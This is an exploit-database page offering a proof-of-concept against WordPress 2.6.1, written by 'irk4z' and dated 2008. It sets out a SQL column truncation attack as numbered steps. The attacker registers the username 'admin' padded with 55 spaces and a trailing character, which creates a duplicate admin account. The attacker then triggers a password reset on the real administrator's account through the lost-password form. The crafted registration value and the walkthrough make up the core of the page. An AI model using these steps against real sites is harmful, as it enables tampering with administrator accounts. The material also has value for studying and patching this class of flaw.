[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress 2.6.1 SQL Column Truncation Vulnerability

Author
irk4z
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3620
Category
web applications
Date add
06-09-2008
Platform
unsorted
===================================================
Wordpress 2.6.1 SQL Column Truncation Vulnerability
===================================================


# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# this is not critical vuln [;
# 
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends

1. go to url: server.com/wp-login.php?action=register

2. register as:

login: admin                                                       x
email: your email

^ admin[55 space chars]x

now, we have duplicated 'admin' account in database

3. go to url: server.com/wp-login.php?action=lostpassword

4. write your email into field and submit this form

5. check your email and go to reset confirmation link

6. admin's password changed, but new password will be send to correct admin email ;/



#  0day.today [2024-11-15]  #